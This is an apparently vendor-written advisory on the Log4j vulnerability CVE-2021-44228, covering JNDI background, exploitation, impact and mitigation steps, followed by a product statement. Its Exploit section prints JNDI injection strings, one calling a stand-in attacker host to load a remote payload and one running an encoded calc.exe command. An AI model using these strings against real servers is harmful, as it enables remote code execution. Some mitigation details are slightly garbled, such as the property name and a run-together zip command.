A vulnerability was discovered in a Java-based logging program known as Log4j on the 10th of December,2021. This vulnerability allows an attacker to execute code on a remote server. Due to the widespread use of Java and the Log4j framework, this could be one of the most serious Internet vulnerabilities after Heartbleed and Shellshock.
Apache Log4j2 <=2.14.1 JNDI (Java Naming and Directory Interface) features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP (Light-weight Directory Access Protocol) and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Background on Apache log4j2 and JNDI
Apache Log4j is an open-source Java-based logging utility that is part of the Apache Logging Services, a project of the Apache Software Foundation. Log4j is one of the Java logging frameworks commonly incorporated into Apache Web servers and spring-Boot web applications. Log4j is used as logging packages in a variety of different popular software by several manufacturers, including Amazon, Apple iCloud, Cisco, Cloudflare, Elasticsearch, Red Hat, Steam, Twitter, Logstash, etc.
JNDI is an application programming interface (API) that provides naming and directory functionality to applications written using the Java programming language. It is defined to be independent of any specific directory service implementation. Thus, a variety of directories - new, emerging, and already deployed can be accessed in a common way.
Figure 1: JNDI Architecture(Oracle, 2021)
Exploit
The vulnerability is in the implementation of the Java Naming and Directory Interface (JNDI), and it can be exploited with an LDAP request like the one below:
${jndi:ldap://attacker_controled_website/payload_to_be_executed} “
Here, we got to the LDAP server which downloads an object that is going to run this base64 command of calc.exe
${jndi:ldap://stupa.local:1389/Basic/Command/Base64/Y2FsYy5leGU=}
Impact
This vulnerability in Log4j2 (CVE-2021-44228) is extremely critical. Anyone who runs Apache frameworks services or Spring Boot Java-based framework applications that use log4j2 is at risk. Log4j is being used by millions of applications for logging, and all an attacker does is get the app to log a specific string.
Mitigation measures
Version 2.16.0 of log4j has been released without vulnerability. Apache-log4j-2.16.0 is available on Apache Log4j page (the latest version of Apache log4j 2.17.0 has been released), you can download it and update it on your system.
Run a search/find/grep (find / -name log4j-core-*.jar) command on all the servers to check the file with the name “log4j”, and make a cross-check if the version is vulnerable or not.
Add “log4j.format.msg.nolookups=true” to the global configuration of your server/web applications for temporary mitigation.
Remove the JNDILookup and JNDIManager classes from the log4j-core jar. Removal of the JNDIManager will cause the JNDIContextSelector and JMSAppender to no longer function (Example:zip-q-dlog4j-core*.jarorg/apache/logging/log4j/core/lookup/JndiLookup.class).
Stupa Vulnerability Management Platform
We have reviewed our Vulnerability Management Platforms, which are not affected by the vulnerability. This includes Netsec, Appsec, Cloudsec, Compliance. We have identified third-party components not related to the operations environments and performed patching and will continue to monitor it internally.
To know more about our Vulnerability Management Platform, Click Here
Contact Us: info@stupa.io
.png)